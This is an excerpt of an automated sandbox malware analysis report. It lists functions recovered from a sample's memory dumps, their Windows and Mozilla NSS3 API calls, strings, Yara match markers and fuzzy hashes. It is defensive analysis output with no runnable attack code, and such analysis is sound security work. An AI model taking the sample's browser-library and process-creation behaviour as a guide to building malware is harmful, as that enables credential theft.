                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00032446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00034A8D), ref: 00032460
                                                                                                                                                                                          • _memset.LIBCMT ref: 00032CDF
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00056710), ref: 00032D31
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                          • API String ID: 2831197775-4119554291
                                                                                                                                                                                          • Opcode ID: 3bb83ac60f823d203e9355bcef7f992f7d41c2eabed64811fc75709de9cc616b
                                                                                                                                                                                          • Instruction ID: fec9d67ded01570b9384b59668085f98517e11b647504e50e4eec46cded1bf67
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bb83ac60f823d203e9355bcef7f992f7d41c2eabed64811fc75709de9cc616b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42415B72A00128BBDF12FBA4EC43ADE7778AF44314F510161FA04B7157DA70AE4A8BE1
                                                                                                                                                                                          Function 6C584D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C584D57
                                                                                                                                                                                          • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C584DE6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorR_snprintf
                                                                                                                                                                                          • String ID: %d.%d
                                                                                                                                                                                          • API String ID: 2298970422-3954714993
                                                                                                                                                                                          • Opcode ID: 8717d34dd41c5d103e1a40a5d9bb367122564b196e0f828e7ac0c462c9d94305
                                                                                                                                                                                          • Instruction ID: 245a115014a03896d8af4de9c47e3f11fc54458f77e9af4a6634311d7c349f71
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8717d34dd41c5d103e1a40a5d9bb367122564b196e0f828e7ac0c462c9d94305
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4331EEB2D02229ABEB109BA19C11BFF776CEF80308F050419ED5597742EB309D05CBE6
                                                                                                                                                                                          Function 0002F093 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Xinvalid_argument_memmovestd::_
                                                                                                                                                                                          • String ID: string too long
                                                                                                                                                                                          • API String ID: 256744135-2556327735
                                                                                                                                                                                          • Opcode ID: 8570abda51f8bace0a4df267ccae70ec0a88b9d68e7ca65534da1d888ac86291
                                                                                                                                                                                          • Instruction ID: 81236bb2aa0fd3d92a4768c8b4abdad719062a50092515bf5e0fce08fe17724f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8570abda51f8bace0a4df267ccae70ec0a88b9d68e7ca65534da1d888ac86291
                                                                                                                                                                                          • Instruction Fuzzy Hash: FC11A371300262EF9B249E2CFC8197AB3B9FF853947540239F9058B642C761ED61C7A1
                                                                                                                                                                                          Function 6C542C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C583440: PK11_GetAllTokens.NSS3 ref: 6C583481
                                                                                                                                                                                            • Part of subcall function 6C583440: PR_SetError.NSS3(00000000,00000000), ref: 6C5834A3
                                                                                                                                                                                            • Part of subcall function 6C583440: TlsGetValue.KERNEL32 ref: 6C58352E
                                                                                                                                                                                            • Part of subcall function 6C583440: EnterCriticalSection.KERNEL32(?), ref: 6C583542
                                                                                                                                                                                            • Part of subcall function 6C583440: PR_Unlock.NSS3(?), ref: 6C58355B
                                                                                                                                                                                          • PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,0000008A,.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.,00080800,?,?,?,?,?,?,?,?), ref: 6C542CC1
                                                                                                                                                                                            • Part of subcall function 6C556D90: memcpy.VCRUNTIME140(?,6C65A8EC,0000006C), ref: 6C556DC6
                                                                                                                                                                                            • Part of subcall function 6C556D90: memcpy.VCRUNTIME140(?,6C65A958,0000006C), ref: 6C556DDB
                                                                                                                                                                                            • Part of subcall function 6C556D90: memcpy.VCRUNTIME140(?,6C65A9C4,00000078), ref: 6C556DF1
                                                                                                                                                                                            • Part of subcall function 6C556D90: memcpy.VCRUNTIME140(?,6C65AA3C,0000006C), ref: 6C556E06
                                                                                                                                                                                            • Part of subcall function 6C556D90: memcpy.VCRUNTIME140(?,6C65AAA8,00000060), ref: 6C556E1C
                                                                                                                                                                                            • Part of subcall function 6C556D90: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C556E38
                                                                                                                                                                                          • PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,00000046,.exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.,00080800,?), ref: 6C542CE8
                                                                                                                                                                                            • Part of subcall function 6C556D90: PK11_DoesMechanism.NSS3(?,?), ref: 6C556E76
                                                                                                                                                                                            • Part of subcall function 6C556D90: TlsGetValue.KERNEL32 ref: 6C55726F
                                                                                                                                                                                            • Part of subcall function 6C556D90: EnterCriticalSection.KERNEL32(?), ref: 6C557283
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon., xrefs: 6C542CAB, 6C542CD5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$K11_$CriticalEnterErrorFlagsGeneratePairSectionValueWith$DoesMechanismTokensUnlock
                                                                                                                                                                                          • String ID: .exesvchost.exesvchost.exesvchost.exesvchost.exeOfficeClickToRun.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesihost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exectfmon.
                                                                                                                                                                                          • API String ID: 2473486326-888798798
                                                                                                                                                                                          • Opcode ID: 9ebbe89e74d7ccd73423fb4b4c50a28bd7dec649ef956d13c2a3cd4107d4c778
                                                                                                                                                                                          • Instruction ID: df3ecc627cdac98812903c79adef0cadc60d02fed620fe42303ca835905f2374
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ebbe89e74d7ccd73423fb4b4c50a28bd7dec649ef956d13c2a3cd4107d4c778
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A1108B1600218BBEB115A529C86FDB366DAB8574CF504021FF54AE280EE72ED5887F6
                                                                                                                                                                                          Function 00031ECF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID: image/jpeg
                                                                                                                                                                                          • API String ID: 2803490479-3785015651
                                                                                                                                                                                          • Opcode ID: b70af1e241bbd7e2a0b282a637fbee17f6830e25915e35eadd27b9bfd3a22f03
                                                                                                                                                                                          • Instruction ID: f98534e055dbd0212496532475fc1a7525548f75229281ecce2744ed4778e941
                                                                                                                                                                                          • Opcode Fuzzy Hash: b70af1e241bbd7e2a0b282a637fbee17f6830e25915e35eadd27b9bfd3a22f03
                                                                                                                                                                                          • Instruction Fuzzy Hash: FB11A576900104FFCB229FA5DC888DEBB7DFF09365F210679E925A3190D7719E409A60
                                                                                                                                                                                          Function 0002F128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F13E
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC5A
                                                                                                                                                                                            • Part of subcall function 0004EC45: __CxxThrowException@8.LIBCMT ref: 0004EC6F
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC80
                                                                                                                                                                                            • Part of subcall function 0002F238: std::_Xinvalid_argument.LIBCPMT ref: 0002F242
                                                                                                                                                                                          • _memmove.LIBCMT ref: 0002F190
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • invalid string position, xrefs: 0002F139
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                          • String ID: invalid string position
                                                                                                                                                                                          • API String ID: 3404309857-1799206989
                                                                                                                                                                                          • Opcode ID: 04f22713ba4ce57d97b8e9f467062d44e711c1d57a02f1f990cbb093bd36cf1f
                                                                                                                                                                                          • Instruction ID: 0ba057c2290becf6d263758a32983657ceb5654178fb1a1f07a143e432308408
                                                                                                                                                                                          • Opcode Fuzzy Hash: 04f22713ba4ce57d97b8e9f467062d44e711c1d57a02f1f990cbb093bd36cf1f
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE11AD71701222EBDB14EE6CFC809B973B6AF553A17940539F91ACB242C370EE60CB91
                                                                                                                                                                                          Function 6C453CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C453D19
                                                                                                                                                                                          • mozalloc_abort.MOZGLUE(?), ref: 6C453D6C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _errnomozalloc_abort
                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                          • API String ID: 3471241338-2564639436
                                                                                                                                                                                          • Opcode ID: 211c0095638287e2015782d33affdf62132a1187683de2ae505f7df7f2890567
                                                                                                                                                                                          • Instruction ID: bfdb49e2f1e3c30b5fbb78b591e6ba0c25df6ff798e6857b10cde15fe8b2162f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 211c0095638287e2015782d33affdf62132a1187683de2ae505f7df7f2890567
                                                                                                                                                                                          • Instruction Fuzzy Hash: 82110135E04699DBEB01DF69C814EEDB775EF96218F84821DEC459B702EB30A5A8C390
                                                                                                                                                                                          Function 0002F34D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 0002F35C
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC5A
                                                                                                                                                                                            • Part of subcall function 0004EC45: __CxxThrowException@8.LIBCMT ref: 0004EC6F
                                                                                                                                                                                            • Part of subcall function 0004EC45: std::exception::exception.LIBCMT ref: 0004EC80
                                                                                                                                                                                          • memmove.MSVCRT(0002EEBE,0002EEBE,C6C68B00,0002EEBE,0002EEBE,0002F15F,?,?,?,0002F1DF,?,?,?,75920440,?,-00000001), ref: 0002F392
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • invalid string position, xrefs: 0002F357
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
                                                                                                                                                                                          • String ID: invalid string position
                                                                                                                                                                                          • API String ID: 1659287814-1799206989
                                                                                                                                                                                          • Opcode ID: 1022b0cade0aa5c17d35b6ad8b14ce6ea98d8e62123b0aa6199f9e08d02346a4
                                                                                                                                                                                          • Instruction ID: 666c7e51a9f3b1ed1c6a1dfdfa7f5bf7899451c6e0fac6f625d5e619f3130827
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1022b0cade0aa5c17d35b6ad8b14ce6ea98d8e62123b0aa6199f9e08d02346a4
                                                                                                                                                                                          • Instruction Fuzzy Hash: C501D1713006628BD724CE68ECD853FB2F6EB84B81730093CE082C7745DB74EA4A8394
                                                                                                                                                                                          Function 6C5A4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3('8Zl,00000000,00000000,?,?,6C5A3827,?,00000000), ref: 6C5A4D0A
                                                                                                                                                                                            • Part of subcall function 6C590840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5908B4
                                                                                                                                                                                          • SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C5A4D22
                                                                                                                                                                                            • Part of subcall function 6C58FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C531A3E,00000048,00000054), ref: 6C58FD56
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Equal_ErrorFindItemsTag_memcmp
                                                                                                                                                                                          • String ID: '8Zl
                                                                                                                                                                                          • API String ID: 1521942269-847864862
                                                                                                                                                                                          • Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
